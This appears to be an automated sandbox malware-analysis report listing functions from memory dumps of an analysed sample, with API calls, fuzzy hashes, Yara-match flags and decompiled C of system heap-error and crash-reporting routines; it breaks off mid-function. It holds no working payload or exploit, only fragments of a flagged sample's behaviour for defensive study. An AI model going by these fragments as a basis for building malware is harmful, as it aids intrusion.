Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6f72f22ad370ba9d623e4e0aa0dd17c4b3af4aedc35a48e53a95bc2b88f8eefd
Instruction ID: 2f5ddf327f504293765d9adc05d82400d70deaaca3cbb0bd1d806336586ee203
Opcode Fuzzy Hash: 6f72f22ad370ba9d623e4e0aa0dd17c4b3af4aedc35a48e53a95bc2b88f8eefd
Instruction Fuzzy Hash: B490027164150402D10061A9481470B4085A7D0342F51C011A1194559DC665885175B1

Uniqueness

Uniqueness Score: -1.00%

Function 019C9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C9A2A

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7b6a1dad41c3fc30560343b67fb413a4eb42ca19450cd83514dbecf9b2be5abc
Instruction ID: 4d216c15438011482312c5d0eede730c4eb11f33b1da1942a47383fbedebbfd5
Opcode Fuzzy Hash: 7b6a1dad41c3fc30560343b67fb413a4eb42ca19450cd83514dbecf9b2be5abc
Instruction Fuzzy Hash: EE900261A4110042414071B988449068085BBE1251B51C121A09C8554DC599886566A5

Uniqueness

Uniqueness Score: -1.00%

Function 019C9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C9A5A

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f02120bf67b91d294afbfdf1c6e97c2b538257554140f125914140b32c122fa
Instruction ID: a553ec6ecb53d0ee124a5fdc08d5c4d5c0cec33b3c717df1c48752f3c292ef5c
Opcode Fuzzy Hash: 5f02120bf67b91d294afbfdf1c6e97c2b538257554140f125914140b32c122fa
Instruction Fuzzy Hash: 7390026165190042D20065B94C14B074085A7D0343F51C115A0184558CC95588616561

Uniqueness

Uniqueness Score: -1.00%

Function 019C9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C966A

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3fe335d3eda69ab25ecbd296e4348c8c3afa4d18c68e15fe827ee80747525bbd
Instruction ID: e3374ca552b59b84f46fc1e73135fe168035c47e38acab4abb676a7e8f565bc7
Opcode Fuzzy Hash: 3fe335d3eda69ab25ecbd296e4348c8c3afa4d18c68e15fe827ee80747525bbd
Instruction Fuzzy Hash: 3890027164110802D18071A9440464A4085A7D1341F91C015A0055658DCA558A5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082E9, Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 80bcb5e9bc83580d7ae3b29eefd7d1e6f6f1aa615ef2ddabc381061d89698861
Instruction ID: 4f40b5e585ee7e5654a9f88d4601a005b31583d4a2ffbb35697ada576b6f36d3
Opcode Fuzzy Hash: 80bcb5e9bc83580d7ae3b29eefd7d1e6f6f1aa615ef2ddabc381061d89698861
Instruction Fuzzy Hash: 1801D831A803187BE720A6A59D43FFF762C6B40F54F04401AFF04BA1C1E6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A241, Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8c149588a53ad2747cedc983b1bee663ce16b558e9bcaa14889f70d9a583ae4a
Instruction ID: db69a4577c1a9533e5677956c04b3561e13133ca31a43345487a0017dff60696
Opcode Fuzzy Hash: 8c149588a53ad2747cedc983b1bee663ce16b558e9bcaa14889f70d9a583ae4a
Instruction Fuzzy Hash: 39F0D1B26012147BD710DFA5CC45EEB3768DF84760F01885AFD0C5B242C131E91086E4

Uniqueness

Uniqueness Score: -1.00%

Function 00408378, Relevance: 1.5, APIs: 1, Instructions: 42threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 1b57a4ddf7ce1de5ca2aaae6244bbd78fdf16d43769389c16a56d836a8ed1757
Instruction ID: c551c6aef20fae65ebd0c3a397170e87603de5ceed73b886230bb6e99c41fc5a
Opcode Fuzzy Hash: 1b57a4ddf7ce1de5ca2aaae6244bbd78fdf16d43769389c16a56d836a8ed1757
Instruction Fuzzy Hash: C7F0E231B8062836E52025641D03FBF660CAB80F15F15402FFF04F92C1E9AD281601EE

Uniqueness

Uniqueness Score: -1.00%

Function 00408373, Relevance: 1.5, APIs: 1, Instructions: 39threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 11d131fc1834c18956a9e18ec0c08feb1fcd3a254829310f89ae4ab1d94557ea
Instruction ID: 917953c95bb200897ed6a413e6b6d3e5d39cf90a3d35a04f92a71ba4de7f6444
Opcode Fuzzy Hash: 11d131fc1834c18956a9e18ec0c08feb1fcd3a254829310f89ae4ab1d94557ea
Instruction Fuzzy Hash: 6DF0A031B8062436F62025695D43FBE6218AB81F15F14402FFF44F91C1EAE9691616EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082B4, Relevance: 1.5, APIs: 1, Instructions: 37threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 23da6eee87e5d11c405dcbedeceac5cac32e1851e43c306d82fce3b9f406a192
Instruction ID: 8225c19f471841723e9d34a513b172f656571e7c1ba8935beecedb398668329f
Opcode Fuzzy Hash: 23da6eee87e5d11c405dcbedeceac5cac32e1851e43c306d82fce3b9f406a192
Instruction Fuzzy Hash: B2F0A7366402183AE6209A599C43FBA7754EBD0F11F24412EFE80B91C09AB5681946F1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C2, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 44faf5f603f4a747f82edd19153ae519cdb8fd40995670176b9ff5b22c2e4c1f
Instruction ID: a03167a7200c71925d4af7012ec500ad67a3c61e9e435f13b8a8a2a5fef130a6
Opcode Fuzzy Hash: 44faf5f603f4a747f82edd19153ae519cdb8fd40995670176b9ff5b22c2e4c1f
Instruction Fuzzy Hash: 54F0A0F5200205ABCB10EFA5CC81EEB37699F84650F05C568F94897241CA31A8108BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A062, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 597c78e49001db6c5a8c4cf5906d616cd4d260b99eb0d48b2924f6f6d096e4ca
Instruction ID: ec108dc4640b3e306c32ea8224194b6c9f5ee37f946e9677f1bdfd8384c127c6
Opcode Fuzzy Hash: 597c78e49001db6c5a8c4cf5906d616cd4d260b99eb0d48b2924f6f6d096e4ca
Instruction Fuzzy Hash: 94E0EDB12003086BC714DF98DC45EE33BB8EF84320F008658F9985B302DA34E8118BF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A2, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a308e6b45efdc444d0651a3dfb130a2633ca2cf40c1086e325a00b5d3a8fce0c
Instruction ID: d55a32fc3a27f246a3fdca050e10ba00eb99f1a64c7298dee6e4b04af4d632b1
Opcode Fuzzy Hash: a308e6b45efdc444d0651a3dfb130a2633ca2cf40c1086e325a00b5d3a8fce0c
Instruction Fuzzy Hash: 44E086746102047FD734DF65CC85FD73768AF5A760F158558FA189F281C535990186A1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000003.00000002.293921450.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 019C967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019C9694

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66f34bcc1a1fa43f114f99bd3ff79a9cb2e480eef62bed3d34fa192286bb2ed4
Instruction ID: 01c5585679010bac82a36db35bf660255ad9d5ac9bee297b0980048fa96f2d57
Opcode Fuzzy Hash: 66f34bcc1a1fa43f114f99bd3ff79a9cb2e480eef62bed3d34fa192286bb2ed4
Instruction Fuzzy Hash: B0B09B71D415C5C6D611D7B44708717794477D0745F16C055D1460645B4778C091F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01A3B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** Critical Section Timeout (%p) in %ws:%s, xrefs: 01A3B39B
*** enter .exr %p for the exception record, xrefs: 01A3B4F1
*** Inpage error in %ws:%s, xrefs: 01A3B418
a NULL pointer, xrefs: 01A3B4E0
read from, xrefs: 01A3B4AD, 01A3B4B2
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01A3B314
The instruction at %p referenced memory at %p., xrefs: 01A3B432
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01A3B305
*** then kb to get the faulting stack, xrefs: 01A3B51C
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01A3B323
*** An Access Violation occurred in %ws:%s, xrefs: 01A3B48F
write to, xrefs: 01A3B4A6
Go determine why that thread has not released the critical section., xrefs: 01A3B3C5
The instruction at %p tried to %s , xrefs: 01A3B4B6
This failed because of error %Ix., xrefs: 01A3B446
*** Resource timeout (%p) in %ws:%s, xrefs: 01A3B352
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01A3B47D
The resource is owned exclusively by thread %p, xrefs: 01A3B374
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01A3B2DC
an invalid address, %p, xrefs: 01A3B4CF
*** enter .cxr %p for the context, xrefs: 01A3B50D
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01A3B53F
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01A3B476
<unknown>, xrefs: 01A3B27E, 01A3B2D1, 01A3B350, 01A3B399, 01A3B417, 01A3B48E
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A3B3D6
*** A stack buffer overrun occurred in %ws:%s, xrefs: 01A3B2F3
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01A3B484
The resource is owned shared by %d threads, xrefs: 01A3B37E
The critical section is owned by thread %p., xrefs: 01A3B3B9
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A3B38F

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: b83dcc87a0389c0298bebac8300ca022032a391042512da66d3822e56eba3a94
Instruction ID: 7d58b7f7ed6563645d4791b02bebf073d377ecaa70583b794fc18ac9ffc5f61a
Opcode Fuzzy Hash: b83dcc87a0389c0298bebac8300ca022032a391042512da66d3822e56eba3a94
Instruction Fuzzy Hash: 4F81F075A40210FFDB22AB5ADC86F7B3B7BAFD7A51F044088F5082B522D3618551CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 01A41C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01A41C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x19648a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0198B150();
				} else {
					E0198B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x1a7589c);
				E0198B150("Heap error detected at %p (heap handle %p)\n",  *0x1a758a0);
				_t27 =  *0x1a75898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01A41E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0198B150();
				} else {
					E0198B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0198B150("Error code: %d - %s\n",  *0x1a75898);
				_t113 =  *0x1a758a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0198B150();
					} else {
						E0198B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0198B150("Parameter1: %p\n",  *0x1a758a4);
				}
				_t115 =  *0x1a758a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0198B150();
					} else {
						E0198B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0198B150("Parameter2: %p\n",  *0x1a758a8);
				}
				_t117 =  *0x1a758ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0198B150();
					} else {
						E0198B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0198B150("Parameter3: %p\n",  *0x1a758ac);
				}
				_t119 =  *0x1a758b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0198B150();
					} else {
						E0198B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x1a758b4);
					E0198B150("Last known valid blocks: before - %p, after - %p\n",  *0x1a758b0);
				} else {
					_t120 =  *0x1a758b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0198B150();
				} else {
					E0198B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0198B150("Stack trace available at %p\n", 0x1a758c0);
			}

0x01a41c10
0x01a41c16
0x01a41c1e
0x01a41c3d
0x01a41c3e
0x01a41c20
0x01a41c35
0x01a41c3a
0x01a41c44
0x01a41c55
0x01a41c5a
0x01a41c65
0x01a41c67
0x00000000
0x01a41c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01a41c67
0x01a41cdc
0x01a41ce5
0x01a41d04
0x01a41d05
0x01a41ce7
0x01a41cfc
0x01a41d01
0x01a41d0b
0x01a41d17
0x01a41d1f
0x01a41d25
0x01a41d30
0x01a41d4f
0x01a41d50
0x01a41d32
0x01a41d47
0x01a41d4c
0x01a41d61
0x01a41d67
0x01a41d68
0x01a41d6e
0x01a41d79
0x01a41d98
0x01a41d99
0x01a41d7b
0x01a41d90
0x01a41d95
0x01a41daa
0x01a41db0
0x01a41db1
0x01a41db7
0x01a41dc2
0x01a41de1
0x01a41de2
0x01a41dc4
0x01a41dd9
0x01a41dde
0x01a41df3
0x01a41df9
0x01a41dfa
0x01a41e00
0x01a41e0a
0x01a41e13
0x01a41e32
0x01a41e33
0x01a41e15
0x01a41e2a
0x01a41e2f
0x01a41e39
0x01a41e4a
0x01a41e02
0x01a41e02
0x01a41e08
0x00000000
0x00000000
0x01a41e08
0x01a41e5b
0x01a41e7a
0x01a41e7b
0x01a41e5d
0x01a41e72
0x01a41e77
0x01a41e95

Strings

heap_failure_virtual_block_corruption, xrefs: 01A41C91
heap_failure_invalid_argument, xrefs: 01A41CAD
Parameter2: %p, xrefs: 01A41DA5
heap_failure_unknown, xrefs: 01A41C75
HEAP: , xrefs: 01A41C16, 01A41C3D, 01A41D04, 01A41D4F, 01A41D98, 01A41DE1, 01A41E32, 01A41E7A
Error code: %d - %s, xrefs: 01A41D12
heap_failure_block_not_busy, xrefs: 01A41CA6
heap_failure_invalid_allocation_type, xrefs: 01A41CB4
HEAP[%wZ]: , xrefs: 01A41C30, 01A41CF7, 01A41D42, 01A41D8B, 01A41DD4, 01A41E25, 01A41E6D
heap_failure_usage_after_free, xrefs: 01A41CBB
heap_failure_internal, xrefs: 01A41C6E
heap_failure_lfh_bitmap_mismatch, xrefs: 01A41CD7
heap_failure_entry_corruption, xrefs: 01A41C83
heap_failure_multiple_entries_corruption, xrefs: 01A41C8A
Last known valid blocks: before - %p, after - %p, xrefs: 01A41E45
Parameter1: %p, xrefs: 01A41D5C
heap_failure_freelists_corruption, xrefs: 01A41CC9
heap_failure_listentry_corruption, xrefs: 01A41CD0
heap_failure_buffer_underrun, xrefs: 01A41C9F
heap_failure_buffer_overrun, xrefs: 01A41C98
heap_failure_cross_heap_operation, xrefs: 01A41CC2
heap_failure_generic, xrefs: 01A41C7C
Parameter3: %p, xrefs: 01A41DEE
Stack trace available at %p, xrefs: 01A41E86
Heap error detected at %p (heap handle %p), xrefs: 01A41C50

Memory Dump Source

Source File: 00000003.00000002.295142309.0000000001960000.00000040.00000001.sdmp, Offset: 01960000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 7c39863eb8f0d5be56ebb3c64f4050624b56939666ad9653c9c8a088bc80e8a8
Instruction ID: e51b287c35efc4b1b8bfa0f3f9135e9318e8dd3a61f8544e4ae00d937cf8fa0f
Opcode Fuzzy Hash: 7c39863eb8f0d5be56ebb3c64f4050624b56939666ad9653c9c8a088bc80e8a8
Instruction Fuzzy Hash: 4F61913A911245DFD622AB89D885E35B3F4FBC4E30B0D80AEF50E5F711D634A8D18B5A

Uniqueness

Uniqueness Score: -1.00%

Function 01993D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01993D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
